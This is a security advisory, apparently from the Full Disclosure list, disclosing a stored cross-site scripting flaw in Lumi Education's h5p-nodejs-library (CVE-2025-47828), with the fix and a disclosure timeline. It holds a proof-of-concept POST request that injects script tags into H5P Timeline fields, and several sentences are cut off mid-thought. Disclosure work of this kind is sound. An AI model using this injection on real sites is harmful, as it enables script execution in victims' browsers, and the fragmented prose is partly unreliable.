SCHUTZWERK-SA-2024-006: Stored Cross-Site Scripting via text fields in H5P module (h5p-nodejs-library) of Lumi Education
David Brown via Fulldisclosure ·
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
executed in victims' browsers when viewing the affected H5P content.
Metadata
========
- - Affected product: h5p-nodejs-library
- - Affected version: All versions prior to 9.3.3
- - Vendor: Lumi Education UG
- - Problem type(s):
- - CVE ID: CVE-2025-47828
- - CVE URL: https://www.cve.org/CVERecord?id=CVE-2025-47828
- - CVSS 3.1 score: 6.4 (Medium)
- - CVSS 3.1 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
- - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-006/
Details
=======
therefore store arbitrary HTML and JavaScript in these fields.
JavaScript alert function:
POST /api/v3/h5p-editor/edit/670e69f55301ad663ba69f9e HTTP/2
Host: example.com
[...]
{
"library": "H5P.Timeline 1.1",
"params": {
"params": {
"timeline": {
"defaultZoomLevel": "0",
"height": 600,
"asset": {
"media": "<script>alert('Alert from media')</script>",
"credit": "<script>alert('Alert from media')</script>",
"caption": "<script>alert('Alert from media')</script>"
},
"date": [
{
"asset": {},
"text": "<p>SW_BodyText2</p>\n",
"startDate": "1900",
"endDate": "9999",
"headline": "SW_HEADLINE2",
"tag": "SW_tags"
}
],
"language": "en",
"headline": "SW_Headline",
"text": "<div>SW_BodyText</div>"
}
},
"metadata": {
"embedTypes": [
"iframe"
],
"language": "en",
"mainLibrary": "H5P.Timeline",
"preloadedDependencies": [
{
"machineName": "TimelineJS",
"majorVersion": 1,
"minorVersion": 1
},
{
"machineName": "H5P.Timeline",
"majorVersion": 1,
"minorVersion": 1
}
],
"defaultLanguage": "en",
"license": "U",
"title": "SW_Timeline-Title",
"authors": [],
"changes": [],
"extraTitle": "SW_Timeline-Title"
}
},
"parentId": "670e36de4c1be96f1bc6bf65",
"parentType": "lessons"
}
server accepted the request and responded with 201 Created.
via stored XSS is possible.
Risk
====
new roles to existing ones.
Solution/Mitigation
===================
Update h5p-nodejs-library to version 9.3.3[0] or later.
Timeline
========
- - 2024-10-14 Vulnerability discovered
- - 2024-11-07 Initial contact attempt with the developer
- - 2024-11-28 Third contact attempt via a message in the Lumi Slack channel
- - 2025-02-11 Release of h5p-nodejs-library v9.3.3
the vulnerability
- - 2025-05-11 CVE-2025-47828 published by MITRE
delayed for undisclosed reasons.
- - 2026-09-22 Advisory released
Credits
=======
SCHUTZWERK GmbH.
Footnotes
=========
[0] https://github.com/Lumieducation/H5P-Nodejs-library/releases/tag/v9.3.3
-----BEGIN PGP SIGNATURE-----
iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmqzbasaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsfVA/9Gl1qipXoGJB/01grCy2a
r9FpwoVkM7LsRCev1w/6RHiBcHeSzxuIufMVd+HHGHmEr3ZwU3XEbuin3LGvuqdJ
CEWHVfLxqMVDl2N0WE6mQYCI6tTPHKUSovYo8U9Nq8OA+lzLsOQpFckmPEqpw1gg
0nifTBsfQ9pe09hC3sOJJFywRrFBopSULyltY1UsORfD8Kf5QSTGS3Px/H2o5xeW
8FRoAzaggpJlDvKkEGMKPAGArVEyFLB9PckwYGo2OrmfaQXRv/YjkZiOM0JzvkIf
tpvGMDqx3/3VYi/BIQK5a6iK06NrUn2+jpKFowXubeHh74vMbzm8r7JyoZOApB19
Z6y4p6tyWQPps4PZVFKursUoTnnOu5ERe+9btglxQ6RZuJsbJwBlXAbhL78ZJ307
zSqPQNs51Hf3j9Nn8z3dVZxjJO6ifTCL7cRXpkWpLX+T67CYQ83IPWLTJ1tc5az2
ogKQtG8BfYLVTnnavjENXAzmTLEYcx8mmkz5bPiK9gPq59VRWRrbgwvRuRjeJ7QC
P3eFZSzH0+Fgr+7T9FX461lb+C8kX7nyh+dxiOGM09mZL+CIJKyWtsTrmQyyrRzO
qhmV7nHV7VMQQKa+udQnRepgCTfWtNwcg/gx/9h11fKVwkE3w+Sdw8anzcHQbFH0
4R7MzYDSPi2iGERjgs4GSNo=
=qFXH
-----END PGP SIGNATURE-----
--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX
Phone +49 731 977 191 0
advisories () schutzwerk com / www.schutzwerk.com
Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer
Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/